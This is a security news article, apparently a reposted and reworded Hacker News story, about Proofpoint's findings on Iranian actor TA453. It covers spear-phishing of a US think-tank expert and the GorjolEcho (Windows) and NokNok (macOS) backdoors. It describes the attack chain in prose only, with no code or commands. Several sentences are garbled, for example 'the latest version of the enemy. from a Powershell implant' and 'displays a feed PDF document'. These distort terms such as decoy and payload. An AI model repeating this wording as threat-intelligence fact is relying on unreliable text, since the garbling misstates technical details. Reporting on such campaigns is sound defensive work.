Advanced Iranian Hacker Malware Targets Windows and macOS Users


July 06, 2023Ravie LakshmananEndpoint/Malware Security

Iranian hackers

The Iranian nation-state actor known as TA453 has been linked to a series of new spear-phishing attacks that infected Windows and macOS operating systems with malware.

“TA453 ended up using multiple cloud hosting providers to deliver a new infection chain implementing the newly identified GorjolEcho PowerShell backdoor,” Proofpoint said in a new report.

“When given the chance, TA453 ported its malware and attempted to launch an Apple-flavored infection chain dubbed NokNok. TA453 also employs multi-person impersonation in its endless quest for espionage.”

TA453, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. More recently, Volexity highlighted the use of the latest version of the enemy. from a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).

In an attack sequence uncovered by an enterprise security firm in mid-May 2023, a crew of hackers sends a phishing email to a nuclear security expert at a US-based think tank focused on foreign affairs that sends a malicious link to a Google Script macro that redirects the target. to the Dropbox URL hosting the RAR archive.

Windows macOS malware

Present within the file is a LNK dropper that initiates a multi-stage procedure to finally deploy GorjolEcho, which, in turn, displays a feed PDF document, while silently waiting for the next stage’s load from the remote server.

But after realizing that the target was using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN app, but is, in fact, an AppleScript that reaches a remote server to download a backdoor. based on a Bash script called NokNok.


🔐 Privileged Access Management: Learn How to Beat Key Challenges

Discover different approaches to conquering Privileged Account Management (PAM) challenges and enhance your privileged access security strategy.

Book Your Place

NokNok, for its part, takes as many as four modules capable of collecting running processes, installed applications, and system metadata and managing persistence using LaunchAgents.

The module “reflects most of the functionality” of the modules associated with CharmPower, with NokNok sharing some overlapping source code with macOS malware previously linked to the group in 2017.

Also exploited by actors are fake file-sharing websites that likely function to fingerprint visitors and act as a mechanism to track successful victims.

“TA453 continues to adapt its malware arsenal, deploy new file types, and target new operating systems,” the researchers said, adding the actor “continues to work toward the same end goal of intrusive and unauthorized reconnaissance” while complicating detection efforts.

Found this article interesting? Follow us on Twitter And LinkedIn to read more exclusive content we post.


Source link

Related Articles

Back to top button